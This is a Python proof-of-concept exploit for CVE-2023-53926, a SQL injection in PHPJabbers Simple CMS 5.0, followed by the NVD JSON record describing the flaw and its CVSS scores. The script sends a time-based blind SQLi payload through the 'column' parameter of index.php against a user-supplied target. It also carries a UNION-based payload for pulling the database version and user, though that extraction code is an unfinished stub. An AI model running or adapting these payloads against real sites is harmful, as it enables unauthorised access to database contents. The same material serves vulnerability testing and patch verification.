CVE-2023-53926

import requests import sys # CVE-2023-53926 PoC - SQL Injection in PHPJabbers Simple CMS 5.0 # Target: index.php endpoint, column parameter def check_vulnerability(target_url): """Check if target is vulnerable to CVE-2023-53926""" # Time-based blind SQL injection payload # If vulnerable, response will be delayed by 5 seconds vulnerable_payload = "1' AND (SELECT * FROM (SELECT SLEEP(5))a) AND '1'='1" normal_payload = "1" try: # Test with normal request normal_params = {"column": normal_payload} normal_response = requests.get(target_url, params=normal_params, timeout=10) # Test with malicious payload vuln_params = {"column": vulnerable_payload} vuln_response = requests.get(target_url, params=vuln_params, timeout=15) # If response time indicates vulnerability if vuln_response.elapsed.total_seconds() >= 5: return True return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False def extract_database_info(target_url): """Extract database information using UNION-based injection""" # UNION-based SQL injection for data extraction union_payload = "1' UNION SELECT 1,2,3,4,5,version(),user(),8,9,10-- -" params = {"column": union_payload} try: response = requests.get(target_url, params=params, timeout=10) # Parse response to extract database info if response.status_code == 200: # Extract version and user from response # Implementation depends on application response format pass except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2023-53926.py <target_url>") print("Example: python cve-2023-53926.py http://target.com/index.php") sys.exit(1) target = sys.argv[1] print(f"[*] Testing target: {target}") print(f"[*] CVE-2023-53926 - PHPJabbers Simple CMS SQL Injection") if check_vulnerability(target): print("[+] Target is VULNERABLE to CVE-2023-53926") else: print("[-] Target may not be vulnerable")

{"cve": {"id": "CVE-2023-53926", "sourceIdentifier": "[email protected]", "published": "2025-12-17T23:15:51.873", "lastModified": "2025-12-24T18:03:04.240", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PHPJabbers Simple CMS 5.0 contains a SQL injection vulnerability in the 'column' parameter that allows remote attackers to manipulate database queries. Attackers can inject crafted SQL payloads through the 'column' parameter in the index.php endpoint to potentially extract or modify database information."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:phpjabbers:simple_cms:5.0:*:*:*:*:*:*:*", "matchCriteriaId": "BB1F6F0F-FE04-4934-B78A-6C0F5825AF8C"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/51416", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.phpjabbers.com/faq.php", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/phpjabbers-simple-cms-sql-injection-via-column-parameter", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}